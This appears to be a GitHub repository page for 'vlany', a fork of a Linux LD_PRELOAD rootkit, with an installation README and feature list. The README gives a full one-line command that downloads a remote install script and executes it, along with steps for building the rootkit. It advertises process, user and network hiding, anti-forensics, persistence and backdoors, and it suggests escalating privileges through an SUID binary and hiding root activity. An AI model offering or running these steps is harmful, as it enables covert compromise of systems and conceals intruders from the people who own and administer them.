Skip to content
/ vlany Public
forked from mempodippy/vlany

Linux LD_PRELOAD rootkit (x86 and x86_64 architectures)

License

Notifications You must be signed in to change notification settings

ohanf/vlany

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

#vlany (wiki) ####vlany is a Linux LD_PRELOAD rootkit.

##Installing

  • vlany's quick_install.sh script is the fastest/easiest method of installation.
    root@vlany:~# wget https://gist.githubusercontent.com/mempodippy/d93fd99164bace9e63752afb791a896b/raw/6b06d235beac8590f56c47b7f46e2e4fac9cf584/quick_install.sh -O /tmp/quick_install.sh && chmod +x /tmp/quick_install.sh && /tmp/quick_install.sh

    The quick_install.sh script automatically downloads the latest version of vlany from this repository, untars the archive, then executes the regular installation script from a new random directory in /tmp/. By default, the quick_install.sh script removes the new directory once execution has completely finished.

  • It's very simple to install vlany onto a sytem as it comes with an automated install script.
    To install vlany you want to first download it from our GitHub ( Always up to date and trusted )
    root@vlany:~# wget https://github.com/mempodippy/vlany/archive/master.tar.gz && tar xvpfz master.tar.gz

  • Once it's downloaded you just have to run install.sh inside vlany-master.
    root@vlany:~# cd vlany-master && ./install.sh
    By default this will prompt you with a tui installation but if cli is prefered you can use the --cli argument to invoke a similar cli installation.

###ASCIICAST OF INSTALLATION
Regular tui installation on a Debian 8 box using an suid binary to escalate privileges from a tmp user. In a real life scenario, you'll want to play with some environment variables to prevent anyone from seeing your activity when root.

##Downloads quick_install.sh
vlany.tar.gz

##Features

  • Process hiding
  • User hiding
  • Network hiding
  • LXC container
  • Anti-Debug
  • Anti-Forensics
  • Persistent (re)installation & Anti-Detection
  • Dynamic linker modifications
  • Backdoors
  • vlany-exclusive commands

##Known bugs Any bugs listed here will be present until a resolve has been reached. If a bug has been reported as an issue, the corresponding issue will also be linked in the bug listing. Should a bug be resolved, the listing will be removed from here, and if any issue is still open pertaining to the bug, it will be closed. ###Serious bugs

  1. Vlany bricks systemd distributions on reboot so sysvinit distributions are safe.
  2. vlany fails to install correctly on anything above CentOS 6.6.

###Minor bugs No minor bugs present as of now. Please use the issues page to report any bugs that may arise while using vlany.

##In-depth README.txt (very detailed but not maintained)
NOTE: vlany is in active development. Changes are constantly being made to this repository, so beware that vlany is very experimental.

About

Linux LD_PRELOAD rootkit (x86 and x86_64 architectures)

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C 74.0%
  • Python 15.6%
  • Shell 10.4%